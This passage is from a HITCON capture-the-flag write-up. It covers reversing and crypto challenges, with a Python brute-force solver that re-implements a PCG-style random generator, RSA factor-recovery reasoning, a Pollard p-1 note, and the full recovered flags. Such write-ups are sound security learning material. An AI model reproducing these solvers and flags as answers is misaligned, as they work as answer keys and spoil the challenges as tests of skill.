<span class="hljs-symbol">  aa:</span>   <span class="hljs-number">81</span> <span class="hljs-number">7d</span> f0 <span class="hljs-number">29</span> <span class="hljs-number">01</span> <span class="hljs-number">99</span> <span class="hljs-number">29</span>    <span class="hljs-keyword">cmp</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x10</span>],<span class="hljs-number">0x29990129</span>
<span class="hljs-symbol">  b1:</span>   <span class="hljs-number">74</span> <span class="hljs-number">07</span>                   <span class="hljs-keyword">je</span>     <span class="hljs-number">0xba</span>
<span class="hljs-symbol">  b3:</span>   c7 <span class="hljs-number">45</span> ec <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x14</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  ba:</span>   8b <span class="hljs-number">45</span> ec                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x14</span>]
<span class="hljs-symbol">  bd:</span>   <span class="hljs-number">5d</span>                      <span class="hljs-keyword">pop</span>    <span class="hljs-built_in">rbp</span>
<span class="hljs-symbol">  be:</span>   c3                      <span class="hljs-keyword">ret</span>
</code></pre><p>It&#39;s the end of the journey. <code>0xedb88320</code> tell me that it could be a customized crc32. But since we have the sha256 hash of the flag and the last part of flag is only 4 bytes long, I just brute force to get the flag</p>
<p>It tooks me only about 1 minute to get the complete flag which is <code>hitcon{tH4nK_U_s0_muCh_F0r_r3c0v3r1ng_+h3_fL4g_1_Luv_y0u_&lt;3}</code></p>
<h3 id="suicune"><a class="header-link" href="#suicune"></a>Suicune</h3>
<p>After the some reverse on the binary, we found some thing:</p>
<ol class="list">
<li>the valid key range is in 0~65535</li>
<li>look like this pusudo code.</li>
</ol>
<pre class="hljs"><code><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">0x10</span>):
    rand = shuffle(range(<span class="hljs-number">256</span>))
    rand = sorted?(rand[:len(flag)])
    flag = [a^b <span class="hljs-keyword">for</span> a, b <span class="hljs-keyword">in</span> zip(flag, rand)][::<span class="hljs-number">-1</span>]</code></pre><p>But after some try, this is not correct....</p>
<p>And we found the <code>sorted</code> would use this <code>randq</code> to break earlier...</p>
<pre class="hljs"><code><span class="hljs-function"><span class="hljs-title">v53</span> = v35-&gt;</span>cLCG;
<span class="hljs-function"><span class="hljs-title">v35</span>-&gt;</span><span class="hljs-function"><span class="hljs-title">cLCG</span> = v35-&gt;</span><span class="hljs-function"><span class="hljs-title">u1</span> + 0x5851F42D4C957F2DLL * v35-&gt;</span>cLCG;
LODWORD(randq) = __ROR4__((v53 ^ (v53 &gt;&gt; <span class="hljs-number">18</span>)) &gt;&gt; <span class="hljs-number">27</span>, v53 &gt;&gt; <span class="hljs-number">59</span>);
<span class="hljs-function"><span class="hljs-title">v53</span> = v35-&gt;</span>cLCG;
<span class="hljs-function"><span class="hljs-title">v35</span>-&gt;</span><span class="hljs-function"><span class="hljs-title">cLCG</span> = v35-&gt;</span><span class="hljs-function"><span class="hljs-title">u1</span> + 0x5851F42D4C957F2DLL * v35-&gt;</span>cLCG;
HIDWORD(randq) = __ROR4__((v53 ^ (v53 &gt;&gt; <span class="hljs-number">18</span>)) &gt;&gt; <span class="hljs-number">27</span>, v53 &gt;&gt; <span class="hljs-number">59</span>);</code></pre><p>And there is a table between input flag length and the execution time.</p>
<table>
<thead>
<tr>
<th style="text-align:right">Flag len</th>
<th style="text-align:right">Time</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:right">9</td>
<td style="text-align:right">0.3s</td>
</tr>
<tr>
<td style="text-align:right">10</td>
<td style="text-align:right">3s</td>
</tr>
<tr>
<td style="text-align:right">11</td>
<td style="text-align:right">42s</td>
</tr>
<tr>
<td style="text-align:right">12</td>
<td style="text-align:right">453s</td>
</tr>
</tbody>
</table>
<p>So we guess the time complexity is <code>O(N!)</code> or <code>O(N*N!)</code>.</p>
<p>And using <code>next_permutation</code> function to sort is <code>O(N*N!)</code>.</p>
<p>Bingo! We get the solution!</p>
<pre class="hljs"><code>m64 = (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">64</span>) - <span class="hljs-number">1</span>
m32 = (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">32</span>) - <span class="hljs-number">1</span>

state = <span class="hljs-number">1234</span>
state = <span class="hljs-number">0x5851F42D4C957F2D</span> * state + <span class="hljs-number">0x5851F42D4C957F2E</span>
state = state &amp; m64

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">ror4</span><span class="hljs-params">(a, b)</span>:</span>
    a = a &amp; m32
    l = a &gt;&gt; b
    h = a &lt;&lt; (<span class="hljs-number">32</span> - b)
    <span class="hljs-keyword">assert</span> (l &amp; h) == <span class="hljs-number">0</span>
    <span class="hljs-keyword">return</span> (l | h) &amp; m32

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">rand_nxt</span><span class="hljs-params">()</span>:</span>
    <span class="hljs-keyword">global</span> state
    x = state
    state = (<span class="hljs-number">1</span> + <span class="hljs-number">0x5851F42D4C957F2D</span> * state) &amp; m64
    <span class="hljs-keyword">return</span> ror4((x ^ (x &gt;&gt; <span class="hljs-number">18</span>)) &gt;&gt; <span class="hljs-number">27</span>, x &gt;&gt; <span class="hljs-number">59</span>)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">rand</span><span class="hljs-params">(maxval)</span>:</span>
    wtf = (-maxval &amp; m32) % maxval
    <span class="hljs-keyword">if</span> wtf:
        <span class="hljs-keyword">while</span> <span class="hljs-keyword">True</span>:
            x = rand_nxt()
            <span class="hljs-keyword">if</span> x &lt; ((-wtf) &amp; m32):
                <span class="hljs-keyword">break</span>
    <span class="hljs-keyword">else</span>:
        x = rand_nxt()
    <span class="hljs-keyword">return</span> x % maxval

flag = list(bytes.fromhex(<span class="hljs-string">'18427c4babb247e51115'</span>))[::<span class="hljs-number">-1</span>]
level=[<span class="hljs-number">1</span>]
<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">1</span>,<span class="hljs-number">50</span>):
    level.append(level[<span class="hljs-number">-1</span>]*i)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">get_perm_ord</span><span class="hljs-params">(ary,index,len)</span>:</span>
    <span class="hljs-keyword">if</span> len == <span class="hljs-number">1</span>:
        <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>
    bgr=<span class="hljs-number">0</span>
    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">1</span>,len):
        bgr += ary[index] &gt; ary[index+i]
    <span class="hljs-keyword">return</span> bgr*level[len<span class="hljs-number">-1</span>]+get_perm_ord(ary,index+<span class="hljs-number">1</span>,len<span class="hljs-number">-1</span>)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">find_kth_permuation</span><span class="hljs-params">(k, arr)</span>:</span>
  <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> arr:
    <span class="hljs-keyword">return</span> []
  <span class="hljs-keyword">assert</span> <span class="hljs-number">0</span> &lt;= k &lt; level[len(arr)], <span class="hljs-string">'k is in wrong range'</span>
  ans = []
  <span class="hljs-keyword">while</span> arr:
    block_size = level[len(arr) - <span class="hljs-number">1</span>]
    block = k//block_size
    ans.append(arr[block])
    <span class="hljs-keyword">del</span> arr[block]
    k = k - block_size * block
  <span class="hljs-keyword">return</span> ans

<span class="hljs-keyword">for</span> key <span class="hljs-keyword">in</span> range(<span class="hljs-number">65536</span>):
<span class="hljs-comment">#for key in range(1234,1235,1):</span>
    <span class="hljs-keyword">if</span> key%<span class="hljs-number">10</span> ==<span class="hljs-number">0</span>:
        print(key)
    state = <span class="hljs-number">0x5851F42D4C957F2D</span> * key + <span class="hljs-number">0x5851F42D4C957F2E</span>
    state = state &amp; m64
    flag = list(bytes.fromhex(<span class="hljs-string">'04dd5a70faea88b76e4733d0fa346b086e2c0efd7d2815e3b6ca118ab945719970642b2929b18a71b28d87855796e344d8'</span>))[::<span class="hljs-number">-1</span>]
    <span class="hljs-keyword">for</span> _ <span class="hljs-keyword">in</span> range(<span class="hljs-number">0x10</span>):
        arr = list(range(<span class="hljs-number">256</span>))
        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(len(arr) - <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">-1</span>):
            j = rand(i + <span class="hljs-number">1</span>)
            arr[i], arr[j] = arr[j], arr[i]
        arr=arr[:len(flag)]
        perm = get_perm_ord(arr,<span class="hljs-number">0</span>,len(flag))
        magic=rand_nxt()
        magic+=rand_nxt()&lt;&lt;<span class="hljs-number">32</span>
        perm+=magic
        <span class="hljs-keyword">if</span>(perm&lt;<span class="hljs-number">0</span>):
            perm=<span class="hljs-number">0</span>
        <span class="hljs-keyword">if</span>(perm&gt;=level[len(flag)]):
            perm=level[len(flag)]<span class="hljs-number">-1</span>
        arr = sorted(arr[:len(flag)])
        arr = find_kth_permuation(perm,arr)
        flag = [a ^ b <span class="hljs-keyword">for</span> a, b <span class="hljs-keyword">in</span> zip(flag[::<span class="hljs-number">-1</span>], arr)]
    flag=flag[::<span class="hljs-number">-1</span>]
    <span class="hljs-keyword">if</span> flag[<span class="hljs-number">0</span>]==ord(<span class="hljs-string">'h'</span>) <span class="hljs-keyword">and</span> flag[<span class="hljs-number">1</span>]==ord(<span class="hljs-string">'i'</span>) <span class="hljs-keyword">and</span> flag[<span class="hljs-number">2</span>]==ord(<span class="hljs-string">'t'</span>) <span class="hljs-keyword">and</span> flag[<span class="hljs-number">3</span>]==ord(<span class="hljs-string">'c'</span>) <span class="hljs-keyword">and</span> flag[<span class="hljs-number">4</span>]==ord(<span class="hljs-string">'o'</span>) <span class="hljs-keyword">and</span> flag[<span class="hljs-number">5</span>]==ord(<span class="hljs-string">'n'</span>):
        print(key)
        print(bytes(flag))
        exit(<span class="hljs-number">0</span>)</code></pre><p><code>hitcon{nth_perm_Ruby_for_writing_X_C_for_running}</code></p>
<h2 id="crypto"><a class="header-link" href="#crypto"></a>Crypto</h2>
<h3 id="lost-modulus-again"><a class="header-link" href="#lost-modulus-again"></a>Lost Modulus Again</h3>
<p>We derived following equations from the cipher scheme</p>
<pre class="hljs"><code>qq' = bp + <span class="hljs-number">1</span>
pp' = cq + <span class="hljs-number">1</span>

bc = p'q' - <span class="hljs-number">1</span>
b + p' = q
c + q' = p

pp' + qq' - <span class="hljs-number">1</span> = pq

(p<span class="hljs-number">-1</span>)(q<span class="hljs-number">-1</span>)
    = pq - p - q + <span class="hljs-number">1</span>
    = pp' + qq' - <span class="hljs-number">1</span> - p - q + <span class="hljs-number">1</span>
    = p(p' - <span class="hljs-number">1</span>) + q(q' - <span class="hljs-number">1</span>)</code></pre><p>And then we use egcd to recover those p, q.</p>
<p>Given the factor of public key, we can get the flag with normal RSA operations.</p>
<h3 id="lost-key-again"><a class="header-link" href="#lost-key-again"></a>Lost Key Again</h3>
<p>Send empty string, <code>00</code> and <code>0000</code> will get <code>Enc(prefix)</code>, <code>Enc(prefix * 256)</code> and <code>Enc(prefix * 256^2)</code>.</p>
<pre class="hljs"><code>Enc(prefix * <span class="hljs-number">256</span>)^<span class="hljs-number">2</span> = Enc(prefix) * Enc(prefix * <span class="hljs-number">256</span>^<span class="hljs-number">2</span>) mod N</code></pre><p>We can recover <code>N</code> by their gcd.</p>
<p>After some testing, we found <code>N</code> is composed by smooth prime.
We can factor it with pollard p-1 algorithm and win.</p>
<h3 id="very-simple-haskell"><a class="header-link" href="#very-simple-haskell"></a>Very simple haskell</h3>
<p>After some reversing, we find that it will select some primes based on input bits and multiplies them together.</p>
<pre class="hljs"><code>bit2int = <span class="hljs-built_in">lambda</span> x: int(''.<span class="hljs-built_in">join</span>(<span class="hljs-built_in">map</span>(str, x)), <span class="hljs-number">2</span>)
m = <span class="hljs-number">129105988525739869308153101831605950072860268575706582195774923614094296354415364173823406181109200888049609207238266506466864447780824680862439187440797565555486108716502098901182492654356397840996322893263870349262138909453630565384869193972124927953237311411285678188486737576555535085444384901167109670365</span>
z = enc * libnum.invmod(m, n) <span class="hljs-symbol">%</span> n
bits = [(z <span class="hljs-symbol">%</span> p == <span class="hljs-number">0</span>) * <span class="hljs-number">1</span> <span class="hljs-keyword">for</span> p <span class="hljs-keyword">in</span> <span class="hljs-built_in">primes</span>]
<span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-number">8</span>*<span class="hljs-number">20</span>, <span class="hljs-number">8</span>):
    <span class="hljs-built_in">print</span>(chr(bit2int(bits[<span class="hljs-number">5</span>:][i:i+<span class="hljs-number">8</span>])))</code></pre>        </article>
      </div>
    </div>
  </body>
</html>